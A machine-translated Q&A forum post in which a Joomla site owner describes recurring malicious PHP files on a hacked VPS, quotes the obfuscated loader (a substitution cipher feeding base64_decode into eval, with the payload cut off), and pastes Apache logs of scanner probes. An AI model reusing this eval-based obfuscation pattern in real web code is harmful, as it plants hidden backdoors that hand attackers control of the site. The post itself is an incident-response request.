1
我的服務器在某處存在漏洞,我需要一些幫助來將其插入。包含base64編碼的PHP文件不斷出現在我的Joomla網站中。包含base64_decode的PHP文件出現在服務器上
我最初被列入黑名單(kelihos被列爲原因),並發現我有一些隨機的,但友好的人性化(login.php,file.php,alias75.php ...)的PHP文件, Joomla目錄中的名稱。所有文件在base64_decode函數之後都有腳本的主要部分。以下是此類文件列表的示例:
-rw-r--r-- 1 www-data www-data 155232 Dec 24 18:51 file.php
注意日期&時間。在聖誕節前的夜晚。這一直是相同的 - 文件顯示在這個mornig上午6點與日期從12月24日。這可能是一個線索也許?下面是實際的代碼片段:
<?php
function jqgwuawwjs($rlkr, $fikixpq){$wynuczq = ''; for($i=0; $i < strlen($rlkr); $i++){$wynuczq .= isset($fikixpq[$rlkr[$i]]) ? $fikixpq[$rlkr[$i]] : $rlkr[$i];}
$jeb="base64_decode";return $jeb($wynuczq);}
$ldo = 'dGCoZSRV5id3buS9XQR9iuMT59Xg1zcSKz0Ok0OUZYcOipECsx'.
'aDIGRDiuS9XQR9X9Xg1PUOk0OUZYcOipECsxaDIYFHiuSH5YE2sGCTICR6ZY2Cb90ayxqmxq7V5iWv'.
這樣下去在接下來的1900線&結尾:
;
$zmdjyoxo = Array('1'=>'I', '0'=>'w', '3'=>'o', '2'=>'1', '5'=>'Z', '4'=>'q', '7'=>'B', '6'=>'0', '9'=>'y', '8'=>'6', 'A'=>'K', 'C'=>'l', 'B'=>'i', 'E'=>'N', 'D'=>'n', 'G'=>'G', 'F'=>'F', 'I'=>'b', 'H'=>'4', 'K'=>'T', 'J'=>'8', 'M'=>'x', 'L'=>'L', 'O'=>'p', 'N'=>'P', 'Q'=>'m', 'P'=>'D', 'S'=>'V', 'R'=>'9', 'U'=>'A', 'T'=>'v', 'W'=>'R', 'V'=>'z', 'Y'=>'W', 'X'=>'c', 'Z'=>'a', 'a'=>'g', 'c'=>'5', 'b'=>'J', 'e'=>'t', 'd'=>'Q', 'g'=>'s', 'f'=>'j', 'i'=>'X', 'h'=>'U', 'k'=>'O', 'j'=>'r', 'm'=>'7', 'l'=>'e', 'o'=>'u', 'n'=>'h', 'q'=>'k', 'p'=>'3', 's'=>'d', 'r'=>'Y', 'u'=>'2', 't'=>'S', 'w'=>'H', 'v'=>'f', 'y'=>'M', 'x'=>'C', 'z'=>'E');
eval(jqgwuawwjs($ldo, $zmdjyoxo));?>
當您更改EVAL打印這是什麼出來(代碼是大對於消息的身體 - 這裏是引擎收錄的鏈接):
我從服務器上刪除所有這些文件,改變了RO ot密碼,mysql密碼,joomla密碼&爲joomla管理員啓動了雙重身份驗證。
一個月前我注意到奇怪的行爲,但在調查問題(可能與此有關)之前,我的提供者 - Host9發生災難性故障。這使我沒有網站&郵件服務器從24日。12月15日至12月1日16(!)。 從那時起,我有一個尋找這些php文件的cron作業。當然,刪除它們只能解決一半的問題。問題是這些文件如何不斷彈出?
我有一個VPS:在x86_64
的Apache/2.4.7
PHP 5.5.9
的Joomla 3.4
Ubuntu服務器的Linux 3.13.0-63泛型。 8
該文件在6:00 am後顯示,所以我在當時包括apache2 access.log:
61.135.190.71 - - [27/Jan/2016:22:56:31 +0000] "GET/HTTP/1.0" 200 430 "http://www.baidu.com/s?wd=www" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
208.52.154.243 - - [28/Jan/2016:01:23:44 +0000] "GET /dbadmin/scripts/setup.php HTTP/1.0" 404 458 "-" "-"
::1 - - [28/Jan/2016:02:56:54 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:02:56:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:02:56:56 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:06:43:36 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:06:56:03 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:11:58 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:20 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:21 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:34 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:23 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:24 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:26 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:31 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:32 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:29:28 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
78.155.39.214 - - [28/Jan/2016:07:47:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 3570 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/js/messages.php?lang=en&db=&token=79eab716479466d5c44116323db94bb0 HTTP/1.1" 200 17157 "http://207.210.201.88/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/phpmyadmin.css.php?server=1&token=79eab716479466d5c44116323db94bb0&nocache=4147360344ltr HTTP/1.1" 200 17556 "http://my.ip.add.ress/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
::1 - - [28/Jan/2016:08:03:53 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:03:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:03:57 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:01 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:17 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:18 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
的Apache2是error.log
[Mon Jan 25 03:30:13.688765 2016] [:error] [pid 25830] [client 95.213.177.123:41264] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Mon Jan 25 03:49:23.091859 2016] [:error] [pid 4517] [client 208.52.154.243:37227] script '/var/www/moadmin.php' not found or unable to stat
[Mon Jan 25 07:40:45.016456 2016] [:error] [pid 19847] [client 95.213.177.124:38892] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Mon Jan 25 23:50:34.056409 2016] [:error] [pid 2434] [client 185.25.151.159:34885] script '/var/www/testproxy.php' not found or unable to stat
[Tue Jan 26 06:47:48.641496 2016] [:error] [pid 6043] [client 95.213.177.122:42690] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Tue Jan 26 10:58:48.569545 2016] [:error] [pid 14076] [client 95.213.177.123:32251] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Tue Jan 26 15:06:42.084295 2016] [core:error] [pid 25454] [client 169.229.3.91:42376] AH00135: Invalid method in request c'\xfdF\x9c\xd8\x02\xb9N\xfa\x8d\xc6J(\x9c\xb0\x04\xa3%
[Thu Jan 28 08:01:43.830310 2016] [mpm_prefork:notice] [pid 3932] AH00169: caught SIGTERM, shutting down
[Thu Jan 28 08:01:44.884060 2016] [mpm_prefork:notice] [pid 26468] AH00163: Apache/2.4.7 (Ubuntu) configured -- resuming normal operations
[Thu Jan 28 08:01:44.884678 2016] [core:notice] [pid 26468] AH00094: Command line: '/usr/sbin/apache2'
[Thu Jan 28 08:21:31.499215 2016] [:error] [pid 26475] [client 78.155.39.214:50308] script '/var/www/phpmyadmin.css.php' not found or unable to stat
你有訪問apache日誌嗎? – dev0
如果文件不斷重現,服務器上的某些內容會受到攻擊,從而允許它們仍然可以訪問它。令人遺憾的是,擺脫這種情況的最簡單的事情是使用完全不同的密碼和乾淨的來源進行乾淨的安裝。檢查你複製的所有內容 –
我剛剛添加了apache2日誌文件的相關部分 – gygoole